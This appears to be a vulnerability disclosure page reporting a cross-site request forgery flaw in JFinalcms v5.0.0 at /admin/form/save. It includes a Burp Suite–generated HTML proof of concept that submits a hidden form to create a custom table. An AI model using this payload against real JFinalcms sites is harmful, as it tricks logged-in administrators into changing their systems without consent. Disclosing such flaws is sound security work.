Author：MengYang

target:https://gitee.com/heyewei/JFinalcms

version:v5.0.0

JFinalcms v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/form/save

create poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8888/admin/form/save" method="POST">
      <input type="hidden" name="name" value="cs" />
      <input type="hidden" name="tableName" value="123" />
      <input type="hidden" name="code" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

successed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CSRF exists at the creation location of the custom table.md

CSRF exists at the creation location of the custom table.md

Files

CSRF exists at the creation location of the custom table.md

Latest commit

History

CSRF exists at the creation location of the custom table.md

File metadata and controls